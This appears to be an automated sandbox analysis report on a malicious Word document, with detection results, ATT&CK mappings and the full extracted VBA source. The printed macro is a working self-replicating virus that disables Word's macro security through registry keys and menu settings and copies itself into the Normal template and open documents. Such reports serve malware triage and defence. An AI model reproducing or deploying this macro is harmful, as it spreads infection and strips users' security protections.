Verdict: MALICIOUS
Risk Score: 180

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros, specifically a Document_Open macro, which is designed to disable security warnings and copy itself to the Normal template and the active document. This behavior aims to establish persistence and ensure the macro executes automatically. The macro also attempts to modify registry keys related to Word's security level, setting it to 1 (low security).
Heuristics (3):
- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1866 bytes |

SHA-256: 62d4339d505bbeb690d47d4327d507c3a55762d1656aca7192bf4b18b3d67e0a

Detection (ClamAV): Doc.Trojan.Tester-2
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'WM97/2K.tEster
Private Sub Document_open()
    Dim id, vxCopy, ThisDoc, ActiveDoc, NormalDot
    On Error Resume Next
    Application.ScreenUpdating = False
    Application.DisplayStatusBar = False
    Application.ShowVisualBasicEditor = False
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    CommandBars("Macro").Controls("Security...").Enabled = False
    CommandBars("Tools").Controls("Macro").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Security", "Level") = 1& 'Word 97
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& 'Word 2000
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& 'Word XP!
    Set ThisDoc = ThisDocument.VBProject.VBComponents(1).CodeModule
    Set NormalDot = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set ActiveDoc = ActiveDocument.VBProject.VBComponents(1).CodeModule
    id = "'WM97/2K.tEster"
    vxCopy = Strings.Trim(ThisDoc.lines(1, ThisDoc.countoflines))
    If id <> NormalDot.lines(1, 1) Then
        NormalDot.deletelines 1, NormalDot.countoflines
        NormalDot.insertlines 1, vxCopy
    End If
    If id <> ActiveDoc.lines(1, 1) Then
        ActiveDoc.deletelines 1, ActiveDoc.countoflines
        ActiveDoc.insertlines 1, vxCopy
        ActiveDocument.SaveAs ActiveDocument.FullName
    End If
    'WM97/2K.tEster by gl_st0rm of [mions]
    'My first "true" macro virii ever...! ;-)
    'Greetz to e[ax] for his WM97/2K.String
End Sub
```